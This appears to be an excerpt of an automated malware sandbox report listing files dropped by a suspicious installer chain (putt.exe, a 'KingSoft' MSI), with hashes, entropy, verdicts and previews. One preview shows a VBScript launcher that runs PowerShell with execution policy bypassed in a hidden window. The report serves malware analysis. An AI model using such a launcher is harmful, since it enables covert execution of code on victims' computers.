                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                  Entropy (8bit):7.373547942480216
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:apAiuDh3JBqjx24pKGKQ6kJBljrn5w7UYkmfOjDb138Px:aBwPuKGPakfDb13g
                                                                                                                                                                                                                                                  MD5:A60A51A234B633C4C402189FF0FD558E
                                                                                                                                                                                                                                                  SHA1:501C84ED7488AB1E4BC90EB9356740B6AA0E3D4C
                                                                                                                                                                                                                                                  SHA-256:392DCA52A41ED530E2AE4D2FCB2E44936AC5F7E7557378E4B60D9A3A99A239F4
                                                                                                                                                                                                                                                  SHA-512:50423E9325BC43FCF47F3C57222F95F08E1B73738D9067B2CD91AE6638D8AFAEB756D17F83FC13003111F82B290323DF4DBBA2D6AC75F2FEFAFFF8081834F55A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:Windows Precompiled iNF, version 2.1, flags 0x2010001, unicoded, at 0x10102 "", at 0x7070709 WinDirPath, LanguageID 909, at 0x9090909 language
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):52224
                                                                                                                                                                                                                                                  Entropy (8bit):6.685645875413775
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:wpkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TK:fQWf05mjccBiqXvpgf
                                                                                                                                                                                                                                                  MD5:7286492DA76FE467D675F4BC75A3B359
                                                                                                                                                                                                                                                  SHA1:410424D584323DF3FB8889BEED88E4165F523AAB
                                                                                                                                                                                                                                                  SHA-256:6A0534C1A06FC535E7D78FCECBA6519600D39FF0BCCC8D69010630C4484785E5
                                                                                                                                                                                                                                                  SHA-512:A23A7A9E4DA1CC30B0318267D1330C8B1C831D33889027107BAA6CEC9D3D13AE43D83A330BBFDE1DC8EB8D7998365746650EA476620B06620DE255A7738D8AB2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):119808
                                                                                                                                                                                                                                                  Entropy (8bit):6.643983910910844
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:70Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHk:ObfSCOMVIPPL/sZ7HS3z4
                                                                                                                                                                                                                                                  MD5:73842ED2C144AB22A0301F7BF71250EB
                                                                                                                                                                                                                                                  SHA1:7848E86E6E92E040FB635377A4BB813E6877EC10
                                                                                                                                                                                                                                                  SHA-256:B63DDC5DD8120693477CB2BE869E65C077A92FD27B6B44815FA702C8A07F5F80
                                                                                                                                                                                                                                                  SHA-512:50A43C9577319BF43031DB61336DBE4731958AC24F2C878271E6108A85653C205E6D0B067450E17528FD6239747B2C0DD1243E2B553AD417CA3C032BE52AF2D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):82944
                                                                                                                                                                                                                                                  Entropy (8bit):7.997399353180572
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:uy7xUhDP49yfwHwrMKzD0X8jRDq7qMpnYzDYGeawL72v7aEtI:576mwrRkX8tu7pYhLwLyv7pe
                                                                                                                                                                                                                                                  MD5:09616A6313080EC4B3845CF427AF1DC3
                                                                                                                                                                                                                                                  SHA1:86801BDA1D8CB25068D8841571E1A309930CEB7B
                                                                                                                                                                                                                                                  SHA-256:76483C788B2C26A70DCBDA07395412BCB0A83184B5D9806344FCFCD08DC847DE
                                                                                                                                                                                                                                                  SHA-512:52DF199B57E222A3F8990139B414E7FD51D2C034A2CD00BBD23BDF3B3A25D745F3241744BFD394E066785D1FFD6F20BA4EA656B516903732EF304A518993ED2D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):978099
                                                                                                                                                                                                                                                  Entropy (8bit):7.973423478278547
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
                                                                                                                                                                                                                                                  MD5:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  SHA1:5763FB49A0DCDB77959CF503F008B6F863C1E92D
                                                                                                                                                                                                                                                  SHA-256:B9C936992C244AB9864CF92BFE3365F7316B306846A4827AA91740DA78DEE813
                                                                                                                                                                                                                                                  SHA-512:EEAA5CD8FF38655B8C4C1105D05862722B660E5EB2A9C74CC08D6EB3D5678BA8803ABD3D0F6CD62B3A385017C19373DA87BF0F1093A5AEAABAC8777FA0C2A144
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):167
                                                                                                                                                                                                                                                  Entropy (8bit):5.055307851182349
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:j+qAHmFEm8nBKjDQBgSSJJLNytGQqPJH0cVERSHmRPt+kiE2J5xAI5NxpFVXBv:j+q9Nq8ssnytGQO0cA1wkn23f5NxpFzv
                                                                                                                                                                                                                                                  MD5:2ECB9BCAD465B5AD76C691F423E99F46
                                                                                                                                                                                                                                                  SHA1:AFB42509BE90ADBE88B88E8BC198696E58660808
                                                                                                                                                                                                                                                  SHA-256:71CE5A097B62D7BAD24DAD6F037BC305EDB30B5AFBCACE068F952EE985FEF038
                                                                                                                                                                                                                                                  SHA-512:4BAADB547DC4AB93D19D548B48F51B87A8F81C3ACBCB7DAC0395B0A09835D7C298AFB5181F1134F686EEFE1D99F285BC7049F2FC6101263D2462AB29862662E7
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:Set objShell = CreateObject("WScript.Shell") ..objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""C:\Users\user\AppData\Local\Temp\11808.ps1""", 0, False ..
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2098688
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  MD5:C1D7C466CF70F32CE2FD51609EA97FAB
                                                                                                                                                                                                                                                  SHA1:D7FA0337F01755188D74E1CA17D9DA89D36572DA
                                                                                                                                                                                                                                                  SHA-256:D10E2BE559191CCEF09F8B31C946FE09840F4C60374D44F6672663C53BA1431A
                                                                                                                                                                                                                                                  SHA-512:36EB43516222C9264F7F6F5D6A3A40FBC879A277C42FB8281DCF7D810192A5087A441B6B107BF9F2410FF9F19DBB68EBC4CA06125FEA67ADFEDBA1FCCB7367ED
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2098688
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  MD5:C1D7C466CF70F32CE2FD51609EA97FAB
                                                                                                                                                                                                                                                  SHA1:D7FA0337F01755188D74E1CA17D9DA89D36572DA
                                                                                                                                                                                                                                                  SHA-256:D10E2BE559191CCEF09F8B31C946FE09840F4C60374D44F6672663C53BA1431A
                                                                                                                                                                                                                                                  SHA-512:36EB43516222C9264F7F6F5D6A3A40FBC879A277C42FB8281DCF7D810192A5087A441B6B107BF9F2410FF9F19DBB68EBC4CA06125FEA67ADFEDBA1FCCB7367ED
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):551466
                                                                                                                                                                                                                                                  Entropy (8bit):6.435992166043616
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4llcFz7UKez1EtOgU7Y4p4nle/DGWG5aS:4yz7UcU7Y4p4KGLp
                                                                                                                                                                                                                                                  MD5:13FF605783972DC773F7C2FA9F1BB3FF
                                                                                                                                                                                                                                                  SHA1:90812F2EBB225311F18216B5E31ECD1D936A24A4
                                                                                                                                                                                                                                                  SHA-256:B55352F6D69C75C5C0EFF68E6533B5EF1E610B8D0539F21BA2557CB960961B7D
                                                                                                                                                                                                                                                  SHA-512:3E0D9A97BE654C361AD0DBE58F0846666C50F94152A9D000F3EB328FC28DB84E1FDB9BFA216B50A791CECA0CECC6617727C43E2BB448F967A6B721A99CDDAC71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}..KingSoft..Setup.msi.@.....@.....@.....@........&.{2FA3CD4B-28FE-4C2B-80E4-DCE280079806}.....@.....@.....@.....@.......@.....@.....@.......@......KingSoft......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{54726178-C674-486D-854B-BD331D9F11FB}-.C:\Program Files (x86)\SoftPortable\KingSoft\.@.......@.....@.....@......&.{DE68DB34-02FE-4559-86D1-5AB24521AE4D}*.02:\Software\SoftPortable\KingSoft\Version.@.......@.....@.....@......&.{1123B093-4171-4C7B-A7CC-3322A7CCA975}`.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\.@.......@.....@.....@......&.{05BD4742-3BAA-4DFE-8690-598F6240A7B3}h.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\StubPath.@.......@.....@.....@.....
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):548192
                                                                                                                                                                                                                                                  Entropy (8bit):6.430181724276051
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:mllcFz7UKez1EtOgU7Y4p4nle/DGWG5ar:myz7UcU7Y4p4KGLo
                                                                                                                                                                                                                                                  MD5:250DA78FACCE68224B24D0FFAD65CA8E
                                                                                                                                                                                                                                                  SHA1:EA82B3EC612720DBF32206B4360CAE84430D13C8
                                                                                                                                                                                                                                                  SHA-256:8BCD09F9C97EEDD41FFAB51B55894DAF605FBB67CAE77AC073D2CBAACB5E2581
                                                                                                                                                                                                                                                  SHA-512:0BA6ECB45CF27E9E0997C0DF1F25846386799EFA6B198CE0E0A1A37BBA7463474E6F6C2D23CF2DF06EF21EBB722370268446F27B7E5087E7DF9D7B5DA4FDE4B2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<..)].\)].\)].\Y.].].\Y.]/].\9.]#].\9.];].\9.]}].\Y.]:].\Y.](].\Y.]2].\)].\.].\a.]2].\a.T\(].\)]<\(].\a.](].\Rich)].\........................PE..d....,Xg.........."....).....D.................@..........................................`.................................................(........p..8.......D@... ..`=..............p.......................(.......@............ ..0............................text...<........................... ..`.rdata...... ......................@..@.data....G..........................@....pdata..D@.......B..................@..@.fptable.....`......................@....rsrc...8....p......................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.1629006092303782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjoAGiLIlHVRpMh/7777777777777777777777777vDHFexmlUzhLp3XlN:JSQI5csxm4hl6F
                                                                                                                                                                                                                                                  MD5:174DF0D2F37F69A85035D299D8A11C9A
                                                                                                                                                                                                                                                  SHA1:939A7CF2537D8F053DF929C55980197B7DCABE3C
                                                                                                                                                                                                                                                  SHA-256:E4E47B3F77B173D924D96D7B33C78864312FD2B4102AFC425122408EFBD09630
                                                                                                                                                                                                                                                  SHA-512:4A67E329BABDF5C5CC47870ACDB5042836401CC7F9D85C124F1CD8E1CC12BAAD1392818766CD3B2C13DD081357C61DAF9DE1E17ACC7AE46982B48B674518088A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):432221
                                                                                                                                                                                                                                                  Entropy (8bit):5.375179380207854
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauU:zTtbmkExhMJCIpEr9
                                                                                                                                                                                                                                                  MD5:DA7BB381056D2DD31D7E17CC062711A0
                                                                                                                                                                                                                                                  SHA1:D8B88A1BC4D267CFBEBC9A766D3D73574AFDCF33
                                                                                                                                                                                                                                                  SHA-256:A733E1B6C0FFD881613CC6B0F910B7B504E48CAFEE27AE954C457BB5A11E16B4
                                                                                                                                                                                                                                                  SHA-512:23A744617CEF7F03A59E3B96B67BD820F505639EA3DCE09CCA2815B93357A9FFD1F8878AC0CBD9086BFDFFDC1C0216305B1DFE9E728B07F31A6FEF4EC7FDE1E0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                  Entropy (8bit):0.13769810836132754
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:zzRdmESkdm5dmESkdmYVAEkrCy6ohovbA7p:zJO9eRCXk
                                                                                                                                                                                                                                                  MD5:EE3A6866B7CEB6475FFC1792F3990FE1
                                                                                                                                                                                                                                                  SHA1:CACAC0DE46381BDED218F315C9EC8F038A57D1D4
                                                                                                                                                                                                                                                  SHA-256:13A3B89390A3BFAF0D8284F194306489A8ED5052C93EA57B0C2FD4309A4E00EE
                                                                                                                                                                                                                                                  SHA-512:E5A4103325523774DC35CBD76F093F35E9066C39EE12E061F7310DF2F7C82EFF51DE594EEA5A16FF79F57ABDC61CC356A97FF6655CC74F05ADB325A5E41AD192
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.06938802215108525
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOexQzlUS0hgvHyVky6l3X:2F0i8n0itFzDHFexmlUzh23X
                                                                                                                                                                                                                                                  MD5:02F21F6F891CF8C01B114126E16EA4AA
                                                                                                                                                                                                                                                  SHA1:ADF0A0D0E104BAE6C24306A6B10FD4CD223743ED
                                                                                                                                                                                                                                                  SHA-256:FACC19DDB35B940212BD7E519C6DE453D92A3D3BA5FE751DEC6D7EA60CDAEC74
                                                                                                                                                                                                                                                  SHA-512:D81EE8A49DA45E9AA10C2020B4E435AB9AFB33569DFED5978A0DF6DFA1CEAB6FA47ED9E699A05C3698BC1BFCCD109791E23E8F02ADDBB8D686B3A3DB6388B815
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
